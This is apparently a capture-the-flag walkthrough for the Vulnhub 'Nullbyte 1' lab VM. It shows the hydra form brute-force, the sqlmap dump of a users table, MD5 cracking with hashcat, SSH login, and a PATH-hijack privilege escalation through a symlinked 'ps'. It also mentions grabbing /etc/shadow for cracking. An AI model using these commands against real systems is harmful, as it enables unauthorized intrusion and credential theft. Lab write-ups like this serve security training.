Vulnhub - Nullbyte 1

Scanning and Enumeration

DHCP Server:



$ nmap -sV
Nmap scan report for
Host is up (0.00027s latency).
Not shown: 997 closed ports
80/tcp  open  http    Apache httpd 2.4.10 ((Debian))
111/tcp open  rpcbind 2-4 (RPC #100000)
777/tcp open  ssh     OpenSSH 6.7p1 Debian 5 (protocol 2.0)
MAC Address: 08:00:27:29:28:0E (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Notable ports:

80 - HTTP Server

777 - SSH Service

111 - rpcbind Service

$ dirb  # dirb maps HTTP server directory by brute force, dirbuster is w/ GUI
# basically just says they use php my admin

Part 1: Site analysis and Steganography

Navigate to There is an interesting image and no other identifying info. Download the picture called main.gif.

$ exiftool main.gif
ExifTool Version Number         : 11.84
File Name                       : main.gif
Directory                       : .
File Size                       : 16 kB
File Modification Date/Time     : 2015:08:01 12:39:30-04:00
File Access Date/Time           : 2020:01:26 16:37:29-05:00
File Inode Change Date/Time     : 2020:01:26 16:37:24-05:00
File Permissions                : rw-r--r--
File Type                       : GIF
File Type Extension             : gif
MIME Type                       : image/gif
GIF Version                     : 89a
Image Width                     : 235
Image Height                    : 302
Has Color Map                   : No
Color Resolution Depth          : 8
Bits Per Pixel                  : 1
Background Color                : 0
Comment                         : P-): kzMb5nVYJw
Image Size                      : 235x302
Megapixels                      : 0.071

The comment is interesting: P-): kzMb5nVYJw.

Part 2: Hydra and Form Brute-forcing

After some thinking and trial and error, navigate to Here we see a form. When we enter a random key into the form at this page, we get “invalid key”. We use this info to formulate a hydra command.

Choose big.txt wordlist, select http-post-form, the address, the location of the form “/kzMb5nVYJw/index.php” with our field “key” and the ^PASS^ string (the variables argument needs at least the strings ^USER^, ^PASS^, ^USER64^ or ^PASS64^), and the third colon delimited argument that designates failure “invalid key”. -l is for our login name which is empty, -f is for exit when a login/pass pair is found, -V is for verbose

$ hydra -P /usr/share/dirb/wordlists/big.txt http-post-form "/kzMb5nVYJw/index.php:key=^PASS^:invalid key" -fV -l ""

$ hydra -P /usr/share/dirb/wordlists/big.txt http-post-form "/kzMb5nVYJw/index.php:key=^PASS^:invalid key" -fV -l ""
[DATA] max 16 tasks per 1 server, overall 16 tasks, 20469 login tries (l:1/p:20469), ~1280 tries per task
[DATA] attacking http-post-form://^PASS^:invalid key
[STATUS] 4476.00 tries/min, 4476 tries in 00:01h, 15993 to do in 00:04h, 16 active
[80][http-post-form] host:   password: elite

Part 3: SQLMap and Forms

Enter “elite” as the key to progress to the next page, which has a form that prompts for a username. After guessing “, we get an error:

Could not get data: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%"' at line 1

The full search after an input is: Knowing this form is hooked up to SQL, we formulate an sqlmap command.

$ sqlmap -u "" -dbs

[18:04:29] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.5
[18:04:29] [INFO] fetching database names
available databases [5]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] seth

seth is the most interesting database, all the others seem standard.

$ sqlmap -u "" -D seth -tables

Database: seth
[1 table]
| users |

$ sqlmap -u "" -D seth -T users -columns

Database: seth
Table: users
[4 columns]
| Column   | Type        |
| position | text        |
| user     | text        |
| id       | smallint(6) |
| pass     | text        |

$ sqlmap -u "" -D seth -T users -C id,position,user,pass -dump

[18:07:57] [INFO] fetching entries of column(s) '`position`, `user`, id, pass' for table 'users' in database 'seth'                                                                                                               
Database: seth
Table: users
[2 entries]
| id | user   | position   | pass                                        |
| 1  | ramses | <blank>    | YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE |
| 2  | isis   | employee   | --not allowed--                             |

Part 4: Password Cracking

ramses’ pass looks like base64, so we decode it with built-in command.

$ echo "YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE" | base64 -d
c6d6bd7ebf806f43c76acc3681703b81base64: invalid input

We get invalid input because string length is not a multiple of 4, but output appears to be an MD5 hash. I add a “=” to the end of the string to remove invalid input response and pipe output to a file called crack_me, and echo for a new line to standard out

$ $ echo "YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE=" | base64 -d | tee crack_me && echo

This looks like an MD5 hash.

$ hashcat –m 0 crack_me /usr/share/wordlists/rockyou.txt --force

Part 5: Gaining Access

Now that we have a username and password, we try to login to the nonstandard ssh port we learned about during scanning.

$ ssh ramses@ -p 777
//enter password omega

We’re in!

Part 6: Privilege Escalation

$ cat .bash_history
//noticed procwatch get invoked from /var/www/backup

$ cd /var/www/backup
$ ./procwatch
//this ELF uses ps at some point during its execution, so lets make a new ps command in this folder and add it to path

$ export PATH="$(pwd):$PATH"

//create symbolic link and name it ps (I tried /bin/bash first, but it did not elevate privileges)
$ ln -s /bin/sh ps
$ ./procwatch 

# whoami
# cd /root/
# ls
# cat proof.txt

It seems that you have pwned the box, congrats. 
Now you done that I wanna talk with you. Write a walk & mail at attach the walk and proof.txt
If is down you may mail at


Version: BCPG C# v1.6.1.0


For fun I also grabbed /etc/passwd and /etc/shadow and unshadowed them on my machine, then used john to try to crack remaining user accounts. I’ll leave that as an exercise to the reader ;)